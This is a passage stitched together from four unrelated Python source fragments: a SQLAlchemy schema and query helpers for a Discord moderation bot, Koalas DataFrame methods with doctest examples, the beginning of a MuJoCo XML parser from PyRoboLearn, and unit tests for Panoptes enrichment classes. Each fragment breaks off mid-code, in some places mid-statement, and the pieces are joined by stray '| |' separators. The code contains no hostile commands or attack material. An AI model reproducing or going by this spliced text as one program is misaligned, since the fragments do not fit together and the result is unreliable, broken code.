__tablename__ = "banned_users_spam"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
user_id = Column(BIGINT, ForeignKey('user_info.user_id'), primary_key=True)
guilds = relationship("Guild", back_populates="banned_users_spam")
user_info = relationship("UserInfo", back_populates="banned_users_spam")
class Channels(Base):
__tablename__ = "channels"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'), primary_key=True)
channel_name = Column(VARCHAR(length=150))
channel_id = Column(BIGINT)
guilds = relationship("Guild", back_populates="channels")
banned_channels_spam = relationship("BannedChannelsSpam", back_populates="channels")
banned_channels_cmds = relationship("BannedChannelsCmds", back_populates="channels")
class Commands(Base):
__tablename__ = "commands"
id = Column(Integer, primary_key=True, autoincrement=True)
command_name = Column(VARCHAR(length=100))
banned_channels_cmds = relationship("BannedChannelsCmds", back_populates="commands")
banned_roles_cmds = relationship("BannedRolesCmds", back_populates="commands")
banned_users_cmds = relationship("BannedUsersCmds", back_populates="commands")
class Errors(Base):
__tablename__ = "Error"
id = Column(BIGINT, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
error = Column(VARCHAR(length=2000))
date = Column(DATETIME)
guilds = relationship("Guild", back_populates="Error")
class Guild(Base):
__tablename__ = "guilds"
guild_id = Column(BIGINT, primary_key=True)
channels = relationship("Channels", back_populates="guilds")
banned_channels_cmds = relationship("BannedChannelsCmds", back_populates="guilds")
banned_roles_cmds = relationship("BannedRolesCmds", back_populates="guilds")
banned_users_cmds = relationship("BannedUsersCmds", back_populates="guilds")
banned_channels_spam = relationship("BannedChannelsSpam", back_populates="guilds")
banned_roles_spam = relationship("BannedRolesSpam", back_populates="guilds")
banned_users_spam = relationship("BannedUsersSpam", back_populates="guilds")
Error = relationship("Errors", back_populates="guilds")
user_info = relationship("UserInfo", back_populates="guilds")
messages = relationship("Messages", back_populates="guilds")
profiles = relationship("Profiles", back_populates="guilds")
reactions = relationship("Reaction", back_populates="guilds")
roles = relationship("Roles", back_populates="guilds")
settings = relationship("Settings", back_populates="guilds")
class Messages(Base):
__tablename__ = "messages"
id = Column(BIGINT, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
user_id = Column(BIGINT, ForeignKey('user_info.user_id'))
message_id = Column(BIGINT)
message = Column(TEXT)
time = Column(DATETIME)
guilds = relationship("Guild", back_populates="messages")
user_info = relationship("UserInfo", back_populates="messages")
reactions = relationship("Reaction", back_populates="messages")
class Profiles(Base):
__tablename__ = 'profiles'
id = Column(BIGINT, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
user_id = Column(BIGINT, ForeignKey('user_info.user_id'))
warnings = Column(Integer, default=0)
kickCount = Column(Integer, default=0)
text_xp = Column(Integer, default=0)
text_lvl = Column(Integer, default=0)
voice_xp = Column(Integer, default=0)
voice_lvl = Column(Integer, default=0)
banned_at = Column(DATETIME)
banned_until = Column(DATETIME)
muted_at = Column(DATETIME)
muted_until = Column(DATETIME)
guilds = relationship("Guild", back_populates="profiles")
user_info = relationship("UserInfo", back_populates="profiles")
class Reaction(Base):
__tablename__ = "reactions"
id = Column(BIGINT, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
message_id = Column(BIGINT, ForeignKey("messages.message_id"))
role_id = Column(BIGINT, ForeignKey("roles.role_id"))
emoji = Column(CHAR)
guilds = relationship("Guild", back_populates="reactions")
roles = relationship("Roles", back_populates="reactions")
messages = relationship("Messages", back_populates="reactions")
class Roles(Base):
__tablename__ = "roles"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
role_id = Column(BIGINT, primary_key=True, autoincrement=True)
role_name = Column(VARCHAR(length=255))
guilds = relationship("Guild", back_populates="roles")
reactions = relationship("Reaction", back_populates="roles")
banned_roles_cmds = relationship("BannedRolesCmds", back_populates="roles")
banned_roles_spam = relationship("BannedRolesSpam", back_populates="roles")
class Settings(Base):
__tablename__ = "settings"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'), primary_key=True, autoincrement=True, nullable=False)
# TODO: make relations to Roles table
# TODO: make relations to channels table
standard_role_id = Column(BIGINT, default=0)
dev_role_id = Column(BIGINT, default=0)
mod_role_id = Column(BIGINT, default=0)
admin_role_id = Column(BIGINT, default=0)
imgwelcome_toggle = Column(BOOLEAN, default=False)
imgwelcome_text = Column(VARCHAR(length=2000), default="V2VsY29tZSB0byB0aGUgc2VydmVyIHlvdSBsaXR0bGUgdXNlcg==")
levelsystem_toggle = Column(BOOLEAN, default=False)
welcome_channel_id = Column(BIGINT, default=0)
leave_channel_id = Column(BIGINT, default=0)
lvl_channel_id = Column(BIGINT, default=0)
cmd_channel_id = Column(BIGINT, default=0)
stdout_channel_id = Column(BIGINT, default=0)
warn_channel_id = Column(BIGINT, default=0)
kick_channel_id = Column(BIGINT, default=0)
ban_channel_id = Column(BIGINT, default=0)
prefix = Column(VARCHAR(length=20), default="LQ==")
Color = Column(VARCHAR(length=25), default="default()")
leave_text = Column(VARCHAR(2000), default="VXNlciB1c2VyIGxlZnQgdGhlIHNlcnZlci4uLg==")
warnThreshold = Column(Integer, default=3)
kickThreshold = Column(Integer, default=2)
banThreshold = Column(Integer, default=2)
messageInterval = Column(Integer, default=2500)
warnMessage = Column(VARCHAR(length=2000), default="Hey $MENTIONUSER, please stop spamming/"
"sending duplicate messages.")
kickMessage = Column(VARCHAR(length=2000), default="$USERNAME was kicked for spamming/sending duplicate messages.")
banMessage = Column(VARCHAR(length=2000), default="$USERNAME was banned for spamming/sending duplicate messages.")
messageDuplicateCount = Column(Integer, default=5)
messageDuplicateAccuracy = Column(FLOAT, default=90)
ignoreBots = Column(BOOLEAN, default=True)
guilds = relationship("Guild", back_populates="settings")
class UserInfo(Base):
__tablename__ = 'user_info'
id = Column(BIGINT, primary_key=True, autoincrement=True)
user_id = Column(BIGINT)
username = Column(String)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
guilds = relationship("Guild", back_populates="user_info")
messages = relationship("Messages", back_populates="user_info")
profiles = relationship("Profiles", back_populates="user_info")
banned_users_spam = relationship("BannedUsersSpam", back_populates="user_info")
banned_users_cmds = relationship("BannedUsersCmds", back_populates="user_info")
class Db:
"""
This class is more or less a layer on top of sqlalchemy,
that can read data from the database and represent it in useful forms.
TODO: add consistent error handling
"""
def __init__(self):
self._session = None
@property
def session(self):
if self._session is None:
self._session = Session()
return self._session
return self._session
def prefix_lookup(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the prefix for the given guild
"""
prefix = self.session.query(Settings.prefix).filter_by(guild_id=guild_id).one()
self.session.commit()
return prefix
async def roles_from_db(self, guild_id: int):
# returns a tuple with all role name's and id's
roles = self.session.query(Roles.role_name, Roles.role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return roles
async def get_admin_role(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the role id of the e.g. admin role for the given guild
"""
role_id = self.session.query(Settings.admin_role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return role_id[0]
async def get_dev_role(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the role id of the e.g. admin role for the given guild
"""
role_id = self.session.query(Settings.dev_role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return role_id[0]
async def get_mod_role(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the role id of the e.g. admin role for the given guild
"""
role_id = self.session.query(Settings.mod_role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return role_id[0]
async def get_standard_role(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the role id of the e.g. admin role for the given guild
"""
role_id = self.session.query(Settings.standard_role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return role_id[0]
async def get_warns(self, guild_id: int, user_id: int):
"""
:param guild_id: the id of the guild
:param user_id: the ID of the user
:returns: the warnings for the given user, can be 0
"""
warnings = self.session.query(Profiles.warnings).filter(Profiles.guild_id == guild_id,
Profiles.user_id == user_id).all()
self.session.commit()
if not warnings:
return 0
return warnings[0][0]
async def get_welcome_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the welcome channel for the given guild
"""
welcome_channel = self.session.query(Settings.welcome_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return welcome_channel[0]
async def get_cmd_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the command channel for the given guild
"""
cmd_channel = self.session.query(Settings.cmd_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return cmd_channel[0]
async def get_lvl_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the level channel for the given guild
"""
lvl_channel = self.session.query(Settings.lvl_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return lvl_channel[0]
async def get_leave_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the leave channel for the given guild
"""
leave_channel = self.session.query(Settings.leave_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return leave_channel[0]
async def get_stdout_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the stdout(logging) channel for the given guild
"""
stdout_channel = self.session.query(Settings.stdout_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return stdout_channel[0]
async def get_warn_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the warn(logging) channel for the given guild
"""
stdout_channel = self.session.query(Settings.warn_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return stdout_channel[0]
async def get_kick_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the kick(logging) channel for the given guild
"""
stdout_channel = self.session.query(Settings.kick_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return stdout_channel[0]
async def get_ban_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the ban(logging) channel for the given guild
"""
stdout_channel = self.session.query(Settings.ban_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return stdout_channel[0]
async def get_leave_text(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the leave text for the given guild
"""
leave_text = self.session.query(Settings.leave_text).filter_by(guild_id=guild_id).all()
self.session.commit()
return leave_text[0][0]
async def get_img(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: wether the welcome image is on or off for the given guild
"""
img = self.session.query(Settings.imgwelcome_toggle).filter_by(guild_id=guild_id).all()
self.session.commit()
return img[0][0]
async def | |
4
"""
if axis is None:
axis = 0
if not (axis == 0 or axis == "index"):
raise NotImplementedError("fillna currently only works for axis=0 or axis='index'")
if value is None:
raise ValueError('Currently must specify value')
if not isinstance(value, (float, int, str, bool, dict, pd.Series)):
raise TypeError("Unsupported type %s" % type(value))
if isinstance(value, pd.Series):
value = value.to_dict()
if isinstance(value, dict):
for v in value.values():
if not isinstance(v, (float, int, str, bool)):
raise TypeError("Unsupported type %s" % type(v))
sdf = self._sdf.fillna(value)
if inplace:
self._sdf = sdf
else:
return DataFrame(sdf, self._metadata.copy())
def head(self, n=5):
"""
Return the first `n` rows.
This function returns the first `n` rows for the object based
on position. It is useful for quickly testing if your object
has the right type of data in it.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
obj_head : same type as caller
The first `n` rows of the caller object.
Examples
--------
>>> df = ks.DataFrame({'animal':['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the first 5 lines
>>> df.head()
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
Viewing the first `n` lines (three in this case)
>>> df.head(3)
animal
0 alligator
1 bee
2 falcon
"""
return DataFrame(self._sdf.limit(n), self._metadata.copy())
@property
def columns(self):
"""The column labels of the DataFrame."""
return pd.Index(self._metadata.data_columns)
@columns.setter
def columns(self, names):
old_names = self._metadata.data_columns
if len(old_names) != len(names):
raise ValueError(
"Length mismatch: Expected axis has %d elements, new values have %d elements"
% (len(old_names), len(names)))
sdf = self._sdf.select(self._metadata.index_columns +
[self[old_name]._scol.alias(new_name)
for (old_name, new_name) in zip(old_names, names)])
self._sdf = sdf
self._metadata = self._metadata.copy(data_columns=names)
@property
def dtypes(self):
"""Return the dtypes in the DataFrame.
This returns a Series with the data type of each column. The result's index is the original
DataFrame's columns. Columns with mixed types are stored with the object dtype.
:return: :class:`pd.Series` The data type of each column.
Examples
--------
>>> df = ks.DataFrame({'a': list('abc'),
... 'b': list(range(1, 4)),
... 'c': np.arange(3, 6).astype('i1'),
... 'd': np.arange(4.0, 7.0, dtype='float64'),
... 'e': [True, False, True],
... 'f': pd.date_range('20130101', periods=3)},
... columns=['a', 'b', 'c', 'd', 'e', 'f'])
>>> df.dtypes
a object
b int64
c int8
d float64
e bool
f datetime64[ns]
dtype: object
"""
return pd.Series([self[col].dtype for col in self._metadata.data_columns],
index=self._metadata.data_columns)
def count(self):
"""
Count non-NA cells for each column.
The values `None`, `NaN` are considered NA.
Returns
-------
pandas.Series
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.shape: Number of DataFrame rows and columns (including NA
elements).
DataFrame.isna: Boolean same-sized DataFrame showing places of NA
elements.
Examples
--------
Constructing DataFrame from a dictionary:
>>> df = ks.DataFrame({"Person":
... ["John", "Myla", "Lewis", "John", "Myla"],
... "Age": [24., np.nan, 21., 33, 26],
... "Single": [False, True, True, True, False]},
... columns=["Person", "Age", "Single"])
>>> df
Person Age Single
0 John 24.0 False
1 Myla NaN True
2 Lewis 21.0 True
3 John 33.0 True
4 Myla 26.0 False
Notice the uncounted NA values:
>>> df.count()
Person 5
Age 4
Single 5
dtype: int64
"""
return self._reduce_for_stat_function(_Frame._count_expr)
def drop(self, labels=None, axis=1, columns: Union[str, List[str]] = None):
"""
Drop specified labels from columns.
Remove columns by specifying label names and axis=1 or columns.
When specifying both labels and columns, only labels will be dropped.
Removing rows is yet to be implemented.
Parameters
----------
labels : single label or list-like
Column labels to drop.
axis : {1 or 'columns'}, default 1
.. dropna currently only works for axis=1 'columns'
axis=0 is yet to be implemented.
columns : single label or list-like
Alternative to specifying axis (``labels, axis=1``
is equivalent to ``columns=labels``).
Returns
-------
dropped : DataFrame
See Also
--------
Series.dropna
Examples
--------
>>> df = ks.DataFrame({'x': [1, 2], 'y': [3, 4], 'z': [5, 6], 'w': [7, 8]},
... columns=['x', 'y', 'z', 'w'])
>>> df
x y z w
0 1 3 5 7
1 2 4 6 8
>>> df.drop('x', axis=1)
y z w
0 3 5 7
1 4 6 8
>>> df.drop(['y', 'z'], axis=1)
x w
0 1 7
1 2 8
>>> df.drop(columns=['y', 'z'])
x w
0 1 7
1 2 8
Notes
-----
Currently only axis = 1 is supported in this function,
axis = 0 is yet to be implemented.
"""
if labels is not None:
axis = self._validate_axis(axis)
if axis == 1:
return self.drop(columns=labels)
raise NotImplementedError("Drop currently only works for axis=1")
elif columns is not None:
if isinstance(columns, str):
columns = [columns]
sdf = self._sdf.drop(*columns)
metadata = self._metadata.copy(
data_columns=[column for column in self.columns if column not in columns]
)
return DataFrame(sdf, metadata)
else:
raise ValueError("Need to specify at least one of 'labels' or 'columns'")
def get(self, key, default=None):
"""
Get item from object for given key (DataFrame column, Panel slice,
etc.). Returns default value if not found.
Parameters
----------
key : object
Returns
-------
value : same type as items contained in object
Examples
--------
>>> df = ks.DataFrame({'x':range(3), 'y':['a','b','b'], 'z':['a','b','b']},
... columns=['x', 'y', 'z'])
>>> df
x y z
0 0 a a
1 1 b b
2 2 b b
>>> df.get('x')
0 0
1 1
2 2
Name: x, dtype: int64
>>> df.get(['x', 'y'])
x y
0 0 a
1 1 b
2 2 b
"""
try:
return self._pd_getitem(key)
except (KeyError, ValueError, IndexError):
return default
def sort_values(self, by, ascending=True, inplace=False, na_position='last'):
"""
Sort by the values along either axis.
Parameters
----------
by : str or list of str
ascending : bool or list of bool, default True
Sort ascending vs. descending. Specify list for multiple sort
orders. If this is a list of bools, must match the length of
the by.
inplace : bool, default False
if True, perform operation in-place
na_position : {'first', 'last'}, default 'last'
`first` puts NaNs at the beginning, `last` puts NaNs at the end
Returns
-------
sorted_obj : DataFrame
Examples
--------
>>> df = ks.DataFrame({
... 'col1': ['A', 'B', None, 'D', 'C'],
... 'col2': [2, 9, 8, 7, 4],
... 'col3': [0, 9, 4, 2, 3],
... },
... columns=['col1', 'col2', 'col3'])
>>> df
col1 col2 col3
0 A 2 0
1 B 9 9
2 None 8 4
3 D 7 2
4 C 4 3
Sort by col1
>>> df.sort_values(by=['col1'])
col1 col2 col3
0 A 2 0
1 B 9 9
4 C 4 3
3 D 7 2
2 None 8 4
Sort Descending
>>> df.sort_values(by='col1', ascending=False)
col1 col2 col3
3 D 7 2
4 C 4 3
1 B 9 9
0 A 2 0
2 None 8 4
Sort by multiple columns
>>> df = ks.DataFrame({
... 'col1': ['A', 'A', 'B', None, 'D', 'C'],
... 'col2': [2, 1, 9, 8, 7, 4],
... 'col3': [0, 1, 9, 4, 2, 3],
... },
... columns=['col1', 'col2', 'col3'])
>>> df.sort_values(by=['col1', 'col2'])
col1 col2 col3
1 A 1 1
0 A 2 0
2 B 9 9
5 C 4 3
4 D 7 2
3 None 8 4
"""
if isinstance(by, str):
by = [by]
if isinstance(ascending, bool):
ascending = [ascending] * len(by)
if len(ascending) != len(by):
raise ValueError('Length of ascending ({}) != length of by ({})'
.format(len(ascending), len(by)))
if na_position not in ('first', 'last'):
raise ValueError("invalid na_position: '{}'".format(na_position))
# Mapper: Get a spark column function for (ascending, na_position) combination
# Note that 'asc_nulls_first' and friends were added as of Spark 2.4, see SPARK-23847.
mapper = {
(True, 'first'): lambda x: Column(getattr(x._jc, "asc_nulls_first")()),
(True, 'last'): lambda x: Column(getattr(x._jc, "asc_nulls_last")()),
(False, 'first'): lambda x: Column(getattr(x._jc, "desc_nulls_first")()),
(False, 'last'): lambda x: Column(getattr(x._jc, "desc_nulls_last")()),
}
by = [mapper[(asc, na_position)](self[colname]._scol)
for colname, asc in zip(by, ascending)]
kdf = DataFrame(self._sdf.sort(*by), self._metadata.copy())
if inplace:
self._sdf = kdf._sdf
self._metadata = kdf._metadata
else:
return kdf
def isin(self, values):
"""
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Define the MuJoCo parser/generator.
Notes:
- MuJoCo only accepts STL meshes
- MuJoCo can load PNG files for textures and heightmap.
References:
- MuJoCo overview: http://www.mujoco.org/book/index.html
- MuJoCo XML format: http://www.mujoco.org/book/XMLreference.html
"""
import os
import copy
import numpy as np
import xml.etree.ElementTree as ET
# import mesh converter (from .obj to .stl)
try:
import trimesh # https://pypi.org/project/trimesh/
from trimesh.exchange.export import export_mesh
# import pymesh # rapid prototyping platform focused on geometry processing
# doc: https://pymesh.readthedocs.io/en/latest/user_guide.html
import pyassimp # library to import and export various 3d-model-formats
# doc: http://www.assimp.org/index.php
# github: https://github.com/assimp/assimp
except ImportError as e:
raise ImportError(str(e) + "\nTry to install trimesh pyassimp: `pip install trimesh pyassimp`")
from pyrobolearn.utils.parsers.robots.world_parser import WorldParser
from pyrobolearn.utils.parsers.robots.data_structures import Simulator, World, Tree, Body, Joint, Inertial, \
Visual, Collision, Light, Floor
from pyrobolearn.utils.transformation import rotation_matrix_x, rotation_matrix_y, rotation_matrix_z, \
get_inverse_homogeneous
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, PyRoboLearn"
__credits__ = ["<NAME>"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
class MuJoCoParser(WorldParser):
r"""MuJoCo Parser and Generator
The MuJoCo parser and generator keeps track of two data structures:
1. The XML tree describing the world (such that we can generate an XML file or string from it).
2. The World data structure that we can pass to other generators to generate their corresponding world file.
Using this class, you can `parse` an XML file or XML string that will automatically generate the XML tree and
the `World` data structure. You can also build the tree from scratch by yourself using the provided methods.
However, note that with the latter approach, you will have to generate the `World` data structure by yourself if
you need it, by calling the `parse` method.
Example of a simple MuJoCo file from [1]:
<mujoco>
<worldbody>
<light diffuse=".5 .5 .5" pos="0 0 3" dir="0 0 -1"/>
<geom type="plane" size="1 1 0.1" rgba=".9 0 0 1"/>
<body pos="0 0 1">
<joint type="free"/>
<geom type="box" size=".1 .2 .3" rgba="0 .9 0 1"/>
</body>
</worldbody>
</mujoco>
Notes:
- MuJoCo only accepts STL meshes
- MuJoCo can load PNG files for textures and heightmap.
Parts of the documentation has been copied-pasted from [1, 2] for completeness purpose.
References:
- [1] MuJoCo overview: http://www.mujoco.org/book/index.html
- [2] MuJoCo XML format: http://www.mujoco.org/book/XMLreference.html
"""
def __init__(self, filename=None):
"""
Initialize the MuJoCo parser and generator.
Args:
filename (str, None): path to the MuJoCo XML file.
"""
super().__init__(filename)
self.simulator = Simulator()
self.compiler = dict() # set options for the built-in parser and compiler
self.options = dict() # simulation options
# default values for the attributes when they are not specified
# {default_type (str): {attribute_name (str): attribute_value (str)}}
self.defaults = dict()
# assets (textures, meshes, etc)
# {asset_type (str): {attribute_name (str): attribute_value (str)}}
self.assets = dict()
# create root XML element
self.create_root("mujoco")
# add <compiler>
self.compiler_tag = self.add_element("compiler", self._root,
attributes={'coordinate': 'local', 'angle': 'radian'})
# add <size>
self.nconmax = 200 # increase this if necessary (this depends on how many models are loaded)
self.size_tag = self.add_element("size", self._root, attributes={"nconmax": str(self.nconmax)})
# add <option>
self.option_tag = self.add_element("option", self._root, attributes={"timestep": str(0.002)})
# add <worldbody>
self.worldbody = self.add_element("worldbody", parent_element=self.root)
# set some counters
self._world_cnt = 0
self._light_cnt = 0
self._tree_cnt = 0
self._body_cnt = 0
self._joint_cnt = 0
self._material_cnt = 0 # material/asset counter
# self._geom_cnt = 0
# self._site_cnt = 0
# save homogenous matrices (for later)
self._h_bodies, self._h_joints, self._h_visuals, self._h_collisions, self._h_inertials = {}, {}, {}, {}, {}
self._assets_tmp = set([])
self._mesh_dirname = ''
#################
# Utils methods #
#################
@staticmethod
def _convert_wxyz_to_xyzw(q):
"""Convert a quaternion in the (w,x,y,z) format to (x,y,z,w).
- Mujoco: (w,x,y,z)
- Bullet: (x,y,z,w)
"""
return np.roll(q, shift=-1)
@staticmethod
def _convert_xyzw_to_wxyz(q):
"""Convert a quaternion in the (x,y,z,w) format to (w,x,y,z).
- Mujoco: (w,x,y,z)
- Bullet: (x,y,z,w)
"""
return np.roll(q, shift=1)
##########
# Parser #
##########
def _get_orientation(self, attrib):
"""
Get the orientation based on the XML attributes.
Args:
attrib (dict): dictionary which contains 'quat', 'euler' (with possibly 'eulereq'), 'axiangle', 'xyaxes',
'zaxis'}.
Returns:
np.array[float[3,3]], np.array[float[3]], str, None: orientation.
"""
orientation = None
# quaternion
if attrib.get('quat') is not None:
quat = attrib.get('quat')
orientation = self._convert_wxyz_to_xyzw([float(q) for q in quat.split()])
# euler orientation
elif attrib.get('euler') is not None:
orientation = attrib.get('euler')
if self.compiler.get('eulerseq') != "xyz": # xyz = rpy
eulerseq = self.compiler['eulerseq'].lower()
orientation = [float(c) for c in orientation.split()]
rot = np.identity(3)
for letter, angle in zip(eulerseq, orientation):
if letter == 'x':
rot *= rotation_matrix_x(angle)
elif letter == 'y':
rot *= rotation_matrix_y(angle)
elif letter == 'z':
rot *= rotation_matrix_z(angle)
else:
raise ValueError("Expecting the letter in 'eulerseq' to be {'x', 'y', 'z', 'X', 'Y', 'Z'}.")
orientation = rot
# axis-angle
elif attrib.get('axisangle') is not None:
axisangle = attrib.get('axisangle').split()
orientation = (axisangle[:3], axisangle[3])
# XY axes
elif attrib.get('xyaxes') is not None:
xyaxes = attrib.get('xyaxes')
xyaxes = np.array([float(c) for c in xyaxes.split()])
x = xyaxes[:3] / np.linalg.norm(xyaxes[:3])
y = xyaxes[3:] / np.linalg.norm(xyaxes[3:])
z = np.cross(x, y)
orientation = np.array([x, y, z]).T
# Z axis
elif attrib.get('zaxis') is not None:
z = np.array([float(c) for c in attrib.get('zaxis').split()])
z = z / np.linalg.norm(z)
z_ = np.array([0., 0., 1.]) # old z axis
x = np.cross(z, z_)
y = np.cross(z, x)
orientation = np.array([x, y, z]).T
return orientation
@staticmethod
def _set_attribute(element, name, value):
"""
Set an attribute value to the given attribute name belonging to the given element.
"""
if hasattr(element, name):
setattr(element, name, value)
def parse(self, filename):
"""
Load and parse the given MuJoCo XML file.
Args:
filename (str, ET.Element): path to the MuJoCo XML file, or XML root element.
"""
if isinstance(filename, str):
# load and parse the XML file
tree_xml = ET.parse(filename)
# get the root
root = tree_xml.getroot()
elif isinstance(filename, ET.Element):
root = filename
else:
raise TypeError("Expecting the given 'filename' to be a string or an ET.Element, but got instead: "
"{}".format(type(filename)))
# check that the root is <mujoco>
if root.tag != 'mujoco':
raise RuntimeError("Expecting the first XML tag to be 'mujoco' but found instead: {}".format(root.tag))
# build the simulator data structure
self.simulator.name = root.attrib.get('model', 'simulator')
# parse compiler: This element is used to set options for the built-in parser and compiler. After parsing and
# compilation it no longer has any effect.
# compiler attributes: boundmass, boundinertia, settotalmass, balanceinertia, strippath, coordinate, angle,
# fitaabb, eulerseq, meshdir, texturedir, discardvisual, convexhull, userthread,
# fusestatic, inertiafromgeom, inertiagrouprange
self._parse_compiler(parent_tag=root)
# parse default: this is the default configuration when they are not specified
# default attribute: mesh, material, joint, geom, site, camera, light, pair, equality, tendon, general, motor,
# position, velocity, cylinder, muscle, custom
self._parse_default(parent_tag=root)
# parse options
self._parse_option(parent_tag=root)
# parse assets: This is a grouping element for defining assets. Assets are created in the model so that they
# can be referenced from other model elements
# asset attributes: texture, hfield, mesh, skin, material
self._parse_asset(parent_tag=root)
# parse (world) body: This element is used to construct the kinematic tree via nesting. The element worldbody
# is used for the top-level body, while the element body is used for all other bodies.
# body attributes: name, childclass, mocap, pos, quat, axisangle, xyaxes, zaxis, euler
self._parse_worldbody(parent_tag=root, update_world_attribute=True)
# parse contact
# contact attributes: pair,
self._parse_contact(parent_tag=root)
# parse equality constraint
# equality attributes: connect, weld, joint, tendon, distance
self._parse_equality_constraint(parent_tag=root)
# parse actuator
# actuator attributes: general, motor, position, velocity, cylinder, muscle
self._parse_actuator(parent_tag=root)
# parse sensor
# sensor attributes: touch, accelerometer, velocimeter, gyro, force, torque, magnetometer, rangefinder,
# jointpos, jointvel, tendonpos, tendonvel, actuatorpos, actuatorvel, actuatorfrce,
# ballquat, ballangvel, jointlimitpos, jointlimitvel, jointlimitfrc, tendonlimitpos,
# tendonlimitvel, tendonlimitfrc, framepos, framequat, framexaxis, frameyaxis, framezaxis,
# framelinvel, frameangvel, framelinacc, frameangacc, subtreecom, subtreelinvel,
# subtreeangmom
self._parse_sensor(parent_tag=root)
def _parse_compiler(self, parent_tag):
"""
Parse the compiler tag if present, and update the `compiler` attribute of this class.
From the main documentation [2]: "This element is used to set options for the built-in parser and compiler.
After parsing and compilation it no longer has any effect. The settings here are global and apply to the
entire model.
Attributes:
- boundmass (real, "0"): This attribute imposes a lower | |
"""
Copyright 2018, Oath Inc.
Licensed under the terms of the Apache 2.0 license. See LICENSE file in project root for terms.
"""
import time
import unittest
import json
import os
from mock import *
from yahoo_panoptes.framework.enrichment import PanoptesEnrichmentSet, PanoptesEnrichmentGroup, \
PanoptesEnrichmentGroupSet, PanoptesEnrichmentSchemaValidator, PanoptesEnrichmentEncoder, \
PanoptesEnrichmentMultiGroupSet
from yahoo_panoptes.framework.resources import PanoptesResource, PanoptesResourcesKeyValueStore
from yahoo_panoptes.enrichment.enrichment_plugin_agent import _store_enrichment_data, \
PanoptesEnrichmentCacheKeyValueStore, enrichment_plugin_task, PanoptesEnrichmentTaskContext
from tests.test_framework import PanoptesMockRedis
from yahoo_panoptes.framework.context import PanoptesContext
mock_time = Mock()
mock_time.return_value = 1512629517.03121
def ordered(obj):
if isinstance(obj, dict):
return sorted((k, ordered(v)) for k, v in obj.items())
if isinstance(obj, list):
return sorted(ordered(x) for x in obj)
else:
return obj
def _get_test_conf_file():
my_dir = os.path.dirname(os.path.realpath(__file__))
panoptes_test_conf_file = os.path.join(my_dir, 'config_files/test_panoptes_config.ini')
return my_dir, panoptes_test_conf_file
class PanoptesEnrichmentInterfaceSchemaValidator(PanoptesEnrichmentSchemaValidator):
schema = {
'enrichment_label': {
'type': 'dict',
'schema': {
'speed': {'type': 'integer'},
'index': {'type': 'integer'},
'status': {'type': 'string'}
}
}
}
def __init__(self):
super(PanoptesEnrichmentInterfaceSchemaValidator, self).__init__()
class PanoptesEnrichmentNeighborSchemaValidator(PanoptesEnrichmentSchemaValidator):
schema = {
'enrichment_label': {
'type': 'dict',
'schema': {
'vlan_id': {'type': 'integer', 'required': True},
'property': {'type': 'string', 'required': True},
'mac': {'type': 'string'}
}
}
}
def __init__(self):
super(PanoptesEnrichmentNeighborSchemaValidator, self).__init__()
class TestEnrichmentFramework(unittest.TestCase):
@patch('yahoo_panoptes.framework.resources.time', mock_time)
def setUp(self):
self.__panoptes_resource = PanoptesResource(resource_site='test', resource_class='test',
resource_subclass='test',
resource_type='test', resource_id='test', resource_endpoint='test',
resource_plugin='test')
self.__panoptes_resource.add_metadata('test', 'test')
def test_enrichment_set(self):
enrichment_set = PanoptesEnrichmentSet('int_001')
enrichment_set.add('speed', 1000)
enrichment_set.add('index', 001)
enrichment_set.add('status', 'up')
self.assertEquals(enrichment_set.key, 'int_001')
self.assertDictEqual(enrichment_set.value, {'status': 'up', 'index': 1, 'speed': 1000})
self.assertEquals(len(enrichment_set), 3)
enrichment_set1 = PanoptesEnrichmentSet('int_002', {'status': 'down', 'index': 2, 'speed': 1000})
